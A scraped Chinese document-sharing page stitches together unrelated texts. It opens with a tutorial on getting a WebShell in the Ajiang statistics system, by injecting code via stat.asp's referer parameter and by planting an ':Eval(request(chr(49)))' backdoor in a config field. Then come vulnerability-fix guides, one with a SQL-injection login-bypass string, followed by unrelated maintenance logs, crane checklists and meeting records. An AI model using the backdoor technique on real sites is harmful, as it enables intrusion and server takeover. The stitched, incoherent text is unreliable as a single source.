阿江统计系统拿WebShell漏洞及修复文库

阿江统计系统拿WebShell漏洞及修复文库.txt始终相信，这世间，相爱的原因有很多，但分开的理由只有一个--爱的还不够。人生有四个存折：健康情感事业和金钱。如果健康消失了，其他的存折都会过期。一般两种方法：

第一：

前提知道数据库路经，并且改成asp或asa后缀！阿江计数程序，可以通过

http://网站 /stat.asp?style=text&referer=代码内容&screenwidth=1024

直接提交，即可把代码内容直接插入到计数系统的数据库中，而此系统默认数据库为count#.asa，我们可以通过http://网站 /count%23.asa访问得到webshell。

由于阿江计数程序过滤了%和+，将最小马改成

替换代码内容处提交，然后用一句话来提交，值得一提的是如果进到计数后台，可以清理某时某刻的数据，一旦插入asp木马失败，可以清理数据库再次操作。某私服内的啊江统计程序默认的数据库count#.asa

第二：

是进了后台拿shell ，一般有人进了后台不知道怎么搞！

那我情魔就分享下在系统管理的全局选项中

有个2、服务器所在时区在里面一般有个8 我们在后面写进 :Eval(request(chr(49)))

成为 8:Eval(request(chr(49))) 这里49是对应的CHR码你也可以换其他的密码

49对应的是 1 密码就是 1 以前我好象也看到过:Eval(request(chr(112)))什么的 112是p

不过都是转载抄袭写的，写的不明白！

然后确认修改我们就用一经常话可以连接了地址是 count/inc_config.asp

https://www.sodocs.net/doc/2f16230483.html,/count/inc_config.asp

就这样OK了！…

以上作者：情魔

附：阿江部分默认数据库：count#.asa、#aj.asp（下载时#号要改为%23）

转载：https://www.sodocs.net/doc/2f16230483.html,/article/bug/800.htm 修复：加强过滤

系统漏洞修复之浅见

系统漏洞修复之浅见 我我瞎折腾的一点经验，大家互相学习，敬请高手指教。 什么是Windows安全漏洞？微软官方定义是：使用者在合理配置了产品的条件下，由于产品自身存在的缺陷，产品的运行可能被改变以产生非设计者预期的后果，并以最终导致安全性被破坏的问题，包括使用者系统被非法侵占、数据被非法访问并泄露，或系统拒绝服务等。事实上，目前多数的病毒和木马，都是利用了各种系统安全漏洞（包括一些应用软件中的漏洞）来进行传播和对用户攻击。 世界上没有百分百完美的软件和程序，任何软件和程序都免不了会出现各种各样的漏洞。那么，我们该如何来避免系统安全漏洞所带来的风险呢？最简单的办法就是在第一时间修复这些漏洞，这好比我们衣服破了要补一样。然而，给系统打补丁也是一门学问，千万不可盲目行事. 一、首先弄清自己的操作系统版本 无论是XP还是win7，均有多个版本，微软发布的系统补丁，同一种系统既有通用性的，也有分版本的，还有针对CPU不同的，因此，弄清自己系统的版本，才能有效选择适合自己系统补丁。 二、弄清是否原版还是修改版 如果是正版或者通过了正版验证的原版（未修改版）系统，选择系统自动更新修复漏洞是最合适不过的了，任何第三方工具均没有微软清楚自己的系统。如果是修改版，由于这类操作系统文件都曾被第

三方修改过，因此在安装从Windows Update下载来的微软官方补丁时，轻则安装失败，重则可能导致系统故障，例如出现电脑蓝屏、不断重启或无法进入“安全模式”等现象。这时候，本土化的第三方打补丁软件反而更加可靠。 三、合理运用第三方工具 本土化的第三方工具虽然为修改版的系统修复漏洞提高了便宜，但是，由于近年来恶性竞争，某些公司出于私利，往往会把一些你根本不需要的补丁提供给你，你不加选择地装上反而增加系统负担。如360安全卫士提示的win7系统高危漏洞KB978188和KB892316,都是我们普通用户不需要的。KB978188解决的是荷兰语版本Windows7MediaCenter的问题。KB982316是针对Windows 电话应用程序编程接口(TAPI) 的更新，此更新主要面向编程等技术人员，家庭用户一般可以不安装此更新。更有“KB3600018”之类的补丁，则是360的私货。因此，对扫描出来的漏洞，一定要查看描述，选择适合自己系统的进行智能修复。 四、修复失败不可怕 安装失败也许是补丁不适合你的操作系统环境，如win7的补丁不能打在xp；也许是你系统经过第三方修改，微软的部分官方补丁会失效；也许是不适合当前软件环境，如你没有安装微软的某个系统组件，对应的补丁自然打不上。安装失败干脆屏蔽，还可节约资源。 五、修改版系统安装补丁前最好先备份

如何修补软件、系统漏洞

如何修补软件、系统漏洞？ 北京李晨光 一、程序为什么会出错？ 程序只能严格按照规则做编程有要它做的事情。但是，最终编写的程序并不总是与程序员预计让程序完成的事情一致。下面的这个笑话可以说明这一问题： 一个人在森林中行走，在地上发现了一盏魔灯。他本能地捡起了魔灯并且用袖子擦拭它。突然，从瓶子里出来了一个魔鬼。魔鬼感谢这个人使他获得了自由，并答应要满足他的三个愿望。这个人欣喜若狂，他确实知道自己想要什么。 “第一”，这个人说，“我想要十亿美元。” 魔鬼很快地晃了一下手指，满满的一袋子钱出现了。 这个人惊奇地睁大眼睛继续说道：“接下来，我想要一部法拉利。” 魔鬼一晃手指，很快地在烟雾中出现了一部法拉利。 这个人继续说：“最后，我想变得对女人有极大的诱惑力。” 魔鬼一挥手指，这个人变成了一盒巧克力。 正像这个人的最后一个愿望的实现是基于他的言语，而不是他的真实想法一样，程序按照指令执行，由于软件漏洞结果出了问题并不总是程序员想要的。有时结果甚至是灾难性的。我们都知道现在软件变得更加复杂，软件越复杂，就越难预测它在各种可能场景下的反应方式，也就越难保证其安全性，当今的操作系统和应用程序的代码行数也越来越多，例如Windows xp大约有4千万行代码，Vista 大约5千多万，Windows 2000有2900万行代码。业界通常使用这样的一个估算方式，即每1000行代码中大约有5~50个BUG。因此，从平均意义上能估计出Windows xp中大约有多少个BUG（只是理论上。）我们都知道黑客对操作系统的攻击都是利用系统软件中的漏洞进行的。那么我们怎么理解什么是漏洞呢？在过去，很多人把漏洞看作是有恶意的人能够利用的软件或硬件的缺陷。然而，在近几年中，漏洞的定义发展成为有恶意的人能够利用的软硬件的缺陷及配置错误。 我们知道了软件有漏洞如何来管理呢，从表面上看，漏洞管理像是个简单的工作。通常是在操作系统上装上一些常用的补丁修补工具，然后自动进行修补，不幸的是，在大部分组织的网络中，漏洞管理既困难又复杂。一个典型的组织中包含定制们有不同的需求，不能只做简单地保护，更不能置之不理。软件厂商仍会发布不安全的代码，硬件厂商也不会将安全内建在产品中，因此这些问题就留给了系统管理员来处理。加入这些必须遵守的规定使管理者感到紧张，并且处于一种高压状况下，容易导致犯严重的错误。 厂商通过不同的途径发现一个漏洞。在理想的情况下，厂商在发布产品之前，会找出并解决所有的安全问题。但是代码的复杂性，加上严格的开发周期，易于产生安全方面的错误。通常一个独立的或商业的安全研究组织会将漏洞告知厂商，并且在有些情况下，厂商会与公众同时发现漏洞，这时不用事先通知，漏洞就被公开了（这时候就会被利用啊）。 二、如何理解漏洞造成的风险？ 不管一个漏洞是如何公开的，该漏洞都对一个组织造成了风险。漏洞带来的风险大小取决于几个因素：厂商对风险的评级、组织中受影响系统的数量、受影响系统的危险程度和暴露程度。比如一个大的银行机构采取措施把所有的金融核算系统都放在网络中，并且置于独立的防火墙之后。尽管分离重要的系统是一种很好的策略，但是有一个因素没有考恕到有大量的员工需要访问这些数据。因此，实际拥有的只是一个用作昂贵钓日志系统的防火墙，该防火墙允许一部分客户端通过。当然，防火墙可以阻止一些威胁，但是如果威胁来自一个允

WEB开发安全漏洞修复方案

密级：保密 WEB开发安全漏洞修复方案 （） 文档编号：文档名称：WEB开发安全漏洞修复方案编写：审核： 批准：批准日期： 技术研究部

文档修订记录

（） (1) 1.1背景 (1) 1.2FSDP安全漏洞清单 (1) 1.3安全漏洞修复方案 (1) 1.3.1会话标识未更新 (1) 1.3.2已解密的登录请求 (4) 1.3.3通过框架钓鱼 (11) 1.3.4链接注入（便于跨站请求伪造） (18) 1.3.5应用程序错误 (26) 1.3.6SQL注入 (29) 1.3.7发现数据库错误模式 (40) 1.3.8启用了不安全的HTTP方法 (51) 1.3.9发现电子邮件地址模式 (54) 1.3.10HTML注释敏感信息泄露 (54) 1.3.11发现内部IP泄露模式 (55) 1.3.12主机允许从任何域进行flash访问 (56) 1.3.13主机应用软件漏洞修复 (57) 1.3.14目录列表 (58) 1.3.15跨站点请求伪造 (59) 1.1需要注意的问题 (60) 1.2用户锁定解锁功能 (60)

1.1背景 随着移动公司对信息安全的进一步加强，要求我们部署的系统必须满足安全扫描要求。本文档描述了安徽移动对FSDP安全扫描的漏洞的解决方案，并作为WEB开发的安全编程规范。 1.2FSDP安全漏洞清单 见《WEB开发安全漏洞清单.xlsx》 1.3安全漏洞修复方案 1.3.1会话标识未更新 (一)URL (二)安全问题描述 根据WASC：“会话固定”是一种攻击技术，会强制用户的会话标识变成显式值。固定会话标识值的技术有许多种，会随着目标Web 站点的功能而不同。从利用“跨站点脚本编 制”到向Web 站点密集发出先前生成的HTTP 请求，都在这些技术范围内。用户的会话标识固定之后，攻击者会等待用户登录，然后利用预定义的会话标识值来假定用户的联机身份。(三)攻击方法 登录过程前后会话标识的比较，显示它们并未更新，这表示有可能伪装用户。初步得知会话标识值后，远程攻击者有可能得以充当已登录的合法用户。 任何时候，只要一名用户与应用程序的交互状态由匿名转变为确认，应用程序就应该发布一个新的会话令牌。这不仅适用于用户成功登录的情况，而且适用于匿名用户首次提交个人或其他敏感信息时。 (四)安全规范要求 COOKIE中的登陆前JSESSIONID与登陆后JESSIONID不能相同。（只有J2EE应用服务器为JESSIONID,其他应用服务器可能不同） (五)解决方案 将如下代码加入到登陆页面（）的最后行： <%

windows系统漏洞怎么修复

Windows系统是大都数电脑所运用的系统，该系统相对稳定，操作简单，但也不时的存在漏洞，我们需要及时的发现和处理漏洞，才能使得电脑继续正常的运行，Windows 系统漏洞怎么修复呢？ 大多数小型企业和个人网站采用直接租用网页空间的形式来架设网站，而网站的拥有者并无操作系统的控制权限，无法通过操作系统层面来进行网站的安全防御，由于各种各样的原因，大多网站并未经过专业的网站安全人员进行审核、测试，因此，小型企业（个人）网站安全隐患非常多，经常会成为网络犯罪的受害者，会造成：网站客户流失、访问量骤减、被屏蔽或列入黑名单 如果出现这种情况，对网站经营者的经济利益影响巨大。为保证这些网站经营者的利益，铱迅信息推出Web网站安全解决方案套餐：网站安全检测与评估、网站代码审计、网站代码安全加固、网站漏洞修补、网站安全维护 从而解决了小型企业（个人）网站安全的后顾之忧，并且每个网站的运营商可根据自身网站的特点来选择不同的服务项目，达到节约开支的目的，本方案的套餐如下： 序号服务项目备注 1评估专业化网站安全检测，给出检测报告。并给出漏洞的种类。包括： 1、系统漏洞（拒绝服务、远程溢出） 2、软件漏洞（拒绝服务、远程溢出） 3、脚本漏洞（SQL注入、XSS等） 4、数据库漏洞（弱口令等） 2SQL注入漏洞修补通用型SQL注入漏洞修补，能防御绝大部分已知的SQL注入攻击 3专业型SQL注入漏洞修补由网安专家，专门针对网站特点、编码结构进行针对性的SQL注入漏洞修补，能防住所有已知的SQL注入攻击和部分未知SQL注入攻击 1、对网站结构进行局部调整 2、修改数据查询方式为安全访问 3、对可能的信息泄露进行补救 4网站漏洞代码审查与修复对网站的代码进行系统审查，检查代码的漏洞，并进行修复，包括： 1、SQL注入漏洞

品管圈圈会议记录表(修复的)

品管圈圈会议记录表 会议记录（一）主题选定 （一）选题过程 评价说明 注：以评价法进行主题评价，共11人参与选题过程，票选分数：5分最高3分普通1分最低，读一顺位为本期活动主题。 （一）本期活动主题 提高家属集中探视率

二活动计划表 辅导员邱玉华圈长：_____ 金鹏飞

邱玉华 记录人 金鹏飞 □主题选定 □计划拟定 ■现状把握 □目标设定 □问题解析□拟 定对策□对策实施 □效果确认 □标准化 □检讨与改进 邱玉华—郭靖—余晓静—赵晗晓—汤语忌—金鹏飞—赵雅丽 徐 林超祝会军张家宽霍然然 会议记录（一）数据收集分析 收集了四月至五月份家属来院探视一共 95人次 在规定时间内探视人次为 49人次，非规定时间探视次数为 46人次，集中探视率为52%，现将非规定 时间探 视结果分析 时间统计如下图 品管圈名称 曙光圈 圈会次数 2014年5月第2次圈会 会议时间 2014..5.30 会议地点 示教室 主持人 本次进度 参加人签名

原因分析如下 原因分析探视人次百分比累计百分比 时间因素1225%25% 个人因素1022%47% 路途因素920%67% 医院因素817%84% 病人因素510%94%其他46%100% （二）柏拉图分析如下 根据二八定律时间因素个人因素路途因素医院因素累计百分比为80%作为本活动改善的主要重点

□主题选定 □计划拟定 □现状把握 ■目标设定 ■问题解析 □拟定对策 □对策实施 □效果确认 □标准化 □检讨与改进 邱玉华郭靖余晓静赵晗晓汤语忌金鹏飞赵雅丽 徐 林超祝会军张家宽霍然然 会议记录 目标设定如下 目标设定：87% 设定理由： 目标值=现况值+改善值 品管圈名称 曙光圈 圈会次数 2014年6月第3次圈会 会议时间 2014..6.10 会议地点 示教室 主持人 邱玉华 记录人 金鹏飞 =现况值+ （现况值x 改善重点x 圈能 力） 本次进度 参加人签名

设备维修保养管理守则及维修记录表.doc

设备维修保养管理制度及维修记录表1 设备维修保养管理制度 为了确保设备安全经济运行，使设备经常处于最佳技术状态，以良好的设备效能和投资效果来保证企业生产经营目标的实现。设备维修保养分为计划性、故障性维修和日常维护保养。 一、计划性维修的管理： 1、维修计划：维修计划由各分公司机修车间负责编制，维修计划分年度计划（设备大修计划）和月度计划（设备中、小修计划），年度维修计划在每年的1月10日前将全年的设备大修计划编制完成后上报，月度维修计划在每月5号前上报。A类、B 类设备原则上每年应进行一次计划性大检修。 2、维修计划的上报和管理： 设备年度维修计划：机修车间→分公司管设备的副经理→分公司经理→总公司设备管理部 设备月度维修计划：机修车间→分公司管设备的副经理→分公司经理 设备维修计划上报批准后，机修车间、分公司管设备的副经理、分公司经理、设备管理部均应保存备查。维修计划均以OA 传送存档。 3、维修计划的执行和检查： 分公司机修车间主任为维修工作的第一责任人，机修车间主

任应根据年度维修计划和月度维修计划和月度维修计划的内容结合生产实际情况，合理安排时间确保维修计划任务的完成。每台设备维修后应填写《设备维修记录》，对设备的性状况应进行检测判定，要使其 设备达到应有的技术要求。设备维修后每月末由分公司管设备的副经理组织使用车间的主任、机修车间主任对本月维修后的设备进行一次检查，对当月因生产等原因未能完成维修计划的在次月上旬要安排完成该部份维修。 二、故障性维修： 设备故障性维修是设备在运行过程出现不正常现象，会影响和危急到设备的正常使用和安全运行时，应及时停止该设备运转，立即组织对该设备进行检查维修。故障维修完成后应检测试车，检查产生故障的因素是否排除，并做好维修记录。 三、日常维护保养 设备维修保养工作，依据设备类别、工作量大小和难易程度，分为日常保养和一、二、三级保养。 1、日常保养 设备日常保养是由操作工人每班每天必须进行的设备保养工作，其内容包括：设备清洁、加油、调整、更换个别零件、检查润滑、声音、漏油、安全附件以及损伤等情况。日常保养配合日常点检和巡检进行，做好日常保养记录。 2、一级保养

WEB应用漏洞及修复汇总

WEB应用漏洞及修复汇总 1.SQL注入 风险等级：高危 漏洞描述： SQL注入漏洞产生的原因是网站应用程序在编写时未对用户提交至服务器的数据进行合法性校验，即没有进行有效地特殊字符过滤，导致网站服务器存在安全风险，这就是SQL Injection，即SQL注入漏洞。 漏洞危害： 机密数据被窃取； 核心业务数据被篡改； 网页被篡改； 数据库所在服务器被攻击从而变为傀儡主机，导致局域网(内网)被入侵。 修复建议： 在网页代码中对用户输入的数据进行严格过滤；（代码层） 部署Web应用防火墙；（设备层） 对数据库操作进行监控。（数据库层） 代码层最佳防御sql漏洞方案： 采用sql语句预编译和绑定变量，是防御sql注入的最佳方法。 原因： 采用了PreparedStatement，就会将sql语句："select id, no from user where id=?" 预先编译好，也就是SQL引擎会预先进行语法分析，产生语法树，生成执行计划，也就是说，后面你输入的参数，无论你输入的是什么，都不会影响该sql 语句的语法结构了，因为语法分析已经完成了，而语法分析主要是分析sql命令，比如select ,from ,where ,and, or ,order by 等等。所以即使你后面输入了这些sql命令，也不会被当成sql命令来执行了，因为这些sql命令的执行，必须先的通过语法分析，生成执行计划，既然语法分析已经完成，已经预编译过了，那么后面输入的参数，是绝对不可能作为sql命令来执行的，只会被当做字符串字面值参数，所以sql语句预编译可以防御sql注入。

其他防御方式： 正则过滤 2.目录遍历 风险等级：中危 漏洞描述： 通过该漏洞可以获取系统文件及服务器的配置文件。利用服务器API、文件标准权限进行攻击。 漏洞危害： 黑客可获得服务器上的文件目录结构，从而下载敏感文件。 修复建议： 1.通过修改配置文件，去除中间件（如IIS、apache、tomcat）的文件目录索引功能 2.设置目录权限 3.在每个目录下创建一个空的index.html页面。 3.跨站脚本 即XSS漏洞，利用跨站脚本漏洞可以在网站中插入任意代码，它能够获取网站管理员或普通用户的cookie，隐蔽运行网页木马，甚至格式化浏览者的硬盘。 漏洞危害： 网络钓鱼，盗取管理员或用户帐号和隐私信息等； 劫持合法用户会话，利用管理员身份进行恶意操作，篡改页面内容、进一步渗透网站； 网页挂马、传播跨站脚本蠕虫等； 控制受害者机器向其他系统发起攻击。 修复建议： 设置httponly httponly无法完全的防御xss漏洞，它只是规定了不能使用js去获取cookie 的内容，因此它只能防御利用xss进行cookie劫持的问题。Httponly是在

常见漏洞以及修复方法

常见漏洞以及修复方法 文:政府事业本部第一事业部劳动人事开发部刘世涛

目录 (一)前言 (3) (二)常见漏洞及原理分析 (3) 1.sql脚本注入 (3) 2.跨站点脚本编制 (3) 3.不安全的HTTP方法及登录验证相关 (4) 4.跨站点请求伪造 (4) 5.危险性较低的开发及配置问题 (4) (三)系统防御原理 (5) 1.sql脚本注入 (5) 2.跨站点脚本编制 (5) 3.不安全的HTTP方法及登录验证相关 (6) 4.跨站点请求伪造 (6) 5.危险性较低的开发及配置问题 (6) (四)结语 (7)

(一)前言 在做互联网的项目中，由于网络用户数量大、环境更加复杂，对系统安全的考虑要更加慎重和全面。我在部门中参与了多个互联网项目，以此为基础，并结合IBM AppScan安全工具，介绍一下我们遇到的几个安全方面的问题及其原理和解决方案。 我们的项目使用的技术主要包括：spring、spring MVC、freemarker、hibernate。 本文主要站在软件系统的构建者和开发者的角度出发，类似网络环境、服务器配置等，可以参考其他资料。 (二)常见漏洞及原理分析 1.sql脚本注入 后台执行sql语句时，使用字符串拼接的方式，并且该字符串是使用浏览器提交的数据时。攻击者将提交的数据就行修改，可以达到执行希望的sql的目的。该攻击比较危险，可能会造成数据破坏和数据盗取的后果。 例如：用户提交username和password两个字段，系统后台判断语句为 String sql = “select * from user where name=’”+username+”’ and password=’”+password+”’”; 后台通过判断查询结果是否为空，来决定用户的账号和密码是否正确。 如果用户将username的值写为admin‘ or 1 or ‘，并且存在账号名称为admin的管理员用户，则可以直接以admin登录成功。 以上例子只是很简单的一种状况，如果某些功能处理不好，有可能会造成大量数据被盗取的严重后果。 2.跨站点脚本编制 攻击者在浏览器向服务端提交的数据中，加入危险的内容，如js脚本等。如果服务器端没有响应的防御措施，则会被注入跨站脚本。典型的攻击分为两类： 持久型：例如攻击者在某博客内留言，该留言内容中嵌有一段获取用户账号cookie的JS 脚本。该博客被某个登录用户访问时，脚本会在用户未知的情况下运行，就会被盗取账号等个人信息。 非持久型：攻击者在查询的请求内，使用URL参数的方式添加html语法内容和非法js 脚本，并且将该URL发送给登录用户。登陆用户点击连接之后，脚本会在用户未知的情况下运行，就有可能被盗取账号等个人信息。

起重机日常维护检修记录表

起重机日常维护检修记录表 工程名称：中煤三建武汉轨道交通27号线一期BT项目第二标段年月日设备名称门式起重机规格型号MG20t 负责人 序号项目要求是 否 完 好 检查状况 1 操纵系统是否灵活 2 检查机体所有限位开关是否灵敏可靠 3 检查信号灯以及指示灯是否损坏 4 检查滑触线以及线路连接是否紧密 5 清扫、擦拭电动机、电器箱，减速器外部灰尘，气吹或用清洗剂喷洗电器箱内部灰尘，并检查各个触电，是否灵敏可靠 6 检查钢丝绳固定情况以及是否断丝 7 检查液压系统油路是否有渗漏情况 8 检查油位、油质是否达标 9 检查吊钩、滑轮情况 10 检查、调整制动抱闸与制动轮的间隙，实现接触均匀、灵敏可靠 11 擦拭并检查传动轴座、齿轮减速箱，联轴器的轴键等是否松动 12 检查各金属结构件有无裂纹、脱焊和开裂、扭曲、变形、严重锈蚀等现象 13 检查并记录易损备用零件型号 14 清扫操作室以及天车运行机构整体框架 15 把起重机工具箱内外擦拭后，将其所有工具逐个擦拭整理，并按取放方便、避免磕碰的原则，整齐地摆放在工具箱内

填写说明1．以上各项由操作人员班前或班后进行 2．检查项目完好打“√”,不合格打“△” 3．本表于每月底，操作人员应报项目部 检修人员（签字）：机管员（签字）： 起重机日常维护检修记录表 工程名称：中煤三建武汉轨道交通27号线一期BT项目第二标段年月日设备名称桥式起重机规格型号QD20t/LD5t 负责人 序号项目要求是 否 完 好 检查状况 1 操纵系统是否灵活 2 检查机体所有限位开关是否灵敏可靠 3 检查信号灯以及指示灯是否损坏 4 检查滑触线以及线路连接是否紧密 5 清扫、擦拭电动机、电器箱，减速器外部灰尘，气吹或用清洗剂喷洗电器箱内部灰尘，并检查各个触电，是否灵敏可靠 6 检查钢丝绳固定情况以及是否断丝 7 检查液压系统油路是否有渗漏情况 8 检查油位、油质是否达标 9 检查吊钩、滑轮情况 10 检查、调整制动抱闸与制动轮的间隙，实现接触均匀、灵敏可靠 11 擦拭并检查传动轴座、齿轮减速箱，联轴器的轴键等是否松动 12 检查各金属结构件有无裂纹、脱焊和开裂、扭曲、变形、严重锈蚀等现象 13 检查并记录易损备用零件型号 14 清扫操作室以及天车运行机构整体框架 15 把起重机工具箱内外擦拭后，将其所有工

系统漏洞修复

系统漏洞修复 【一什么是系统漏洞？】 漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。 【二什么是漏洞补丁?】 操作程序，尤其是WINDOWS，各种软件，游戏，在原公司程序编写员发现软件存在问题或漏洞，统称为BUG，可能使用户在使用系统或软件时出现干扰工作或有害于安全的问题后，写出一些可插入于源程序的程序语言，这就是补丁。 如果系统存在漏洞，请及时打上漏洞补丁，以防止恶意软件，木马，病毒的攻击。 【三360安全卫士支持哪些系统的漏洞修复？】 360安全卫士目前仅支持windows xp和windows 2000系统的漏洞的检测及漏洞补丁的下载。【四360安全卫士所提供的漏洞补丁来自何处？】 360安全卫士所提供的漏洞补丁均直接链接至自微软官方补丁下载地址。 360安全卫士目前仅支持windows xp和windows 2000系统的漏洞的检测及漏洞补丁的下载。 【五360安全卫士下载的补丁保存在什么位置？】 通过360安全卫士所下载的漏洞补丁安装程序位置为：C:\Program Files\360safe\hotfix 如果您已经安装完毕这些补丁，可以将这些补丁安装程序删除以节约系统空间 【六为什么有时候会提示我需要非独立安装】 就是这个补丁不能和其他补丁一起安装，有时候还可能需要重启。把这个装完后再继续安装别的补丁 【七修复系统漏洞后还应该做什么】 在您修复系统漏洞以后，请启动360进行木马查杀；木马经常会利用系统漏洞侵入系统盗取账号密码。 如果遇到木马杀不掉，推荐您使用360顽固木马专杀工具。 下载地址：https://www.sodocs.net/doc/2f16230483.html,/4005462/2922024.html

校舍日常维护和保养检查记录表

校舍日常检查和维护记录表学校（盖章） 201 年月日

填表说明： （表一）学校建筑物普查： 指现在使用的校舍的安全状况，通过普查、及时发现需要维修的内容，及时处理，以延长校舍使用寿命，同时便于及时跟踪掌握这些建筑物的使用情况，及时的组织有关人员进行维修，确保住用安全。 此表由总务处负责，请按规定检查和填写，并对存在安全隐患情况适当说明，检查记录要进行存档，安全隐患的地点和设施要上报，并进行整改。。（表二）学生宿舍相关物品： 首先要考虑到消防通道必须畅通，与之相应的应急灯、安全疏散标志及灭火器都应配备及悬挂到位。同时要求宿舍管理员加强责任心，每月定期检查相关设备，定期检查灭火器的有效期限。 （表三）学生食堂相关物品： 除了食堂工作人员应具备的个人卫生条件、严格把好进货外，对食堂的设备及用气、用电安全也应分别指定专人负责。并要求做到人人了解并掌握基本的消防工作知识，能及时扑灭因不慎而引起的小火。 （表四）体育器械： 这是学校体育课、活动课使用的重要教学设备，它的安全程度，将关系到学生生命的头等大事。因此，学校要负责检查这些器械的安全，及时检查并认真做好纪录。一旦发现问题，及时上报有关部门，同时将维修结果及时记录在案。 （表五）地上其他附着物： 指学校的围墙、大门、旗杆、自行车车库、临时搭建物、构筑物、树木、花坛等是否安全也属于需要经常检查项目之一，由总务处负责检查，并填写此表；发现问题、及时维修，并将维修时间与结果填写于表内。 （表六）室内悬挂物： 指教室内、办公室、实验室内的悬挂物，如广播喇叭、电视机、电扇等，也应定期检查，发现问题及时维修或更换，并认真做好维修、更换纪录。 （表七）灭火器： 指实验室、计算机房、阶梯教室等专用教室的灭火器材，要求由专人保管，定期检查灭火器的有效期限，并认真做好检查记录，由保管人填写，总务处收存，其他公共场所及校内的灭火器由总务处安排检查和记录、保管。 校舍安全检查每年春秋季开学前各检查一次，未经检查不得开学。并认真填写《校舍安全定期检查记录表》。 （表八）配电、避雷： （表九）室内外线路：

漏洞修复

主机漏洞修复 第二个漏洞：远程主机正在运行XDMCP。这个协议是用来提供X显示连接X终端。XDMCP完全是不安全的，因为交通和密码不加密。攻击者可能利用此漏洞捕获使用主机通过X终端用户的所有按键，包括密码。同时XDMCP是一个额外的登录机制，你可能没有意识到已启用，或者不可能监控失败登录 修复： 1、 vi /etc/gdm/custom.conf ［xdmcp] 字段里将 Enable=true 删除 或者直接禁用X： vi /etc/inittab id:5:initdefault: 改成 id:3:initdefault: linux如何禁止某个ip连接服务器 /etc/hosts.allow和/etc/hosts.deny两个文件是控制远程访问设置的，通过设置这个文件可以允许或者拒绝某个ip或者ip段的客户访问linux的某项服务。 如果请求访问的主机名或IP不包含在/etc/hosts.allow中，那么tcpd进程就检查/etc/hosts. deny。看请求访问的主机名或IP有没有包含在hosts.deny文件中。如果包含，那么访问就被拒绝；如果既不包含在/etc/hosts.allow中，又不包含在/etc/hosts.deny中，那么此访问也被允许。 文件的格式为：:[:::...] daemon list：服务进程名列表，如telnet的服务进程名为in.telnetd client list：访问控制的客户端列表，可以写域名、主机名或网段，如https://www.sodocs.net/doc/2f16230483.html,或者192. 168.1. option：可选选项，这里可以是某些命令，也可以是指定的日志文件 文件示例：hosts.deny文件 in.telnetd:https://www.sodocs.net/doc/2f16230483.html, vsftpd:192.168.0. sshd:192.168.0.0/255.255.255.0

---设备维修保养管理制度及维修记录表

设备维修保养管理制度 为了确保设备安全经济运行，使设备经常处于最佳技术状态，以良好的设备效能和投资效果来保证企业生产经营目标的实现。设备维修保养分为计划性维修、故障性维修和日常维护保养。 一、计划性维修的管理： 1、维修计划：维修计划由各分公司机修车间负责编制，维修计划分年度计划（设备大修计划）和月度计划（设备中、小修计划），年度维修计划在每年的1月10日前将全年的设备大修计划编制完成后上报，月度维修计划在每月5号前上报。A类、B类设备原则上每年应进行一次计划性大检修。 2、维修计划的上报和管理： 设备年度维修计划：机修车间→设备部→分管副总→常务副总 设备月度维修计划：机修车间→设备部→分管副总 设备维修计划上报批准后，机修车间、设备部、分管副总、常务副总均应保存备查。同时维修计划均以OA平台传送存档。 3、维修计划的执行和检查： 设备部机修车间主任为维修工作的第一责任人，机修车间主任应根据年度维修计划和月度维修计划和月度维修计

划的内容结合生产实际情况，合理安排时间确保维修计划任务的完成。每台设备维修后应填写《设备维修记录》，对设备的性状况应进行检测判定，要使其设备达到应有的技术要求。设备维修后每月末由设备部组织使用车间的生产厂长、机修车间主任对本月维修后的设备进行一次检查，对当月因生产等原因未能完成维修计划的，在次月上旬要安排完成该部份维修计划。 二、故障性维修： 设备故障性维修是设备在运行过程出现不正常现象，会影响和危急到设备的正常使用和安全运行时，应及时停止该设备运转，立即组织对该设备进行检查维修。故障维修完成后应检测试车，检查产生故障的因素是否排除，并填好《设备维修记录》。 三、日常维护保养 设备维修保养工作，依据设备类别、工作量大小和难易程度，分为日常保养和一、二、三级保养。 1、日常保养 设备日常保养是由操作工人每班每天必须进行的设备保养工作，其内容包括：设备清洁、加油、调整、更换个别零件、检查润滑、声音、漏油、安全附件以及损伤等情况。日常保养配合日常点检和巡检进行，做好日常保养记录。 2、一级保养 一级保养是对设备的定期检查维护，一般每周一次，一级保养以检查为主，辅以维护性检修的一种间接预防性维